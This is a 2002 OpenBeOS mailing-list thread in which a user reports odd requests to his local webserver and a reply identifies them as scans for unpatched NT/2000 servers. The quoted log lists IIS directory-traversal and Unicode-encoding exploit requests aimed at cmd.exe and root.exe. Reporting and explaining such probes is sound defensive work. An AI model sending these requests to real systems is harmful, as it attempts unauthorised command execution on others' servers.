All those commands the hacker sent are scans to see if there is an common (unpatched) NT server at that IP. An NT/2000 server that is unpatched would give the directory of c:\ as a result of any one of those commands. jtarbox ----- Original Message ----- From: "Daniel Reinhold" <danielr@xxxxxxxxxxxxx> To: "Public OBOS mailing list" <openbeos@xxxxxxxxxxxxx> Sent: Tuesday, March 19, 2002 1:48 AM Subject: [openbeos] I think someone tried to hack into my machine > Ok, this was rather interesting. It happened just about fifteen minutes > ago (as I'm writing this). > > I'm online (PPP dialup) and am also running a local webserver (i.e. > sending requests to loopback address 127.0.0.1). Yeah, that's asking > for trouble, at least theoretically. That is, someone on the internet, > if they happened to get a hold of my (temporary, dynamically assigned) > IP, could send requests for local files and have them sent back out > across the network. I've never had anything weird happen before, so > I've always been pretty blase about the security risk. > > Anyway, I'm just testing some news items locally before copying them > over to the OpenBeOS website (which is my usual MO). Suddenly, I notice > the Terminal window (largely covered by another window, but partially > showing) has a flurry of text flying by and the DUN replicant in the > Deskbar shows lots of bytes transmitting back and forth. Wtf? So I > uncover the Terminal window (which is running the webserver) and see > that a number of unusual requests have just been attended to. Here's > the first one: > > GET /scripts/root.exe?/c+dir HTTP/1.0 > Host: www > Connnection: close > > The remaining requests all look like that but with different URLs. Here > are the other URLs that were requested: > > GET /MSADC/root.exe?/c+dir HTTP/1.0 > GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ > dir HTTP/1.0 > GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ > dir HTTP/1.0 > GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. > /winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > > To me, that looks all the world like some hacker trying to grab files > from my local machine. Could there be another explanation? > > Of course, I'm running BeOS (and don't have NT) so my local webserver > just returned a bunch of 404 (Not found) responses. Still, makes you > wonder. > > Has anyone else on this list had any similar experiences? What do you > make of this? >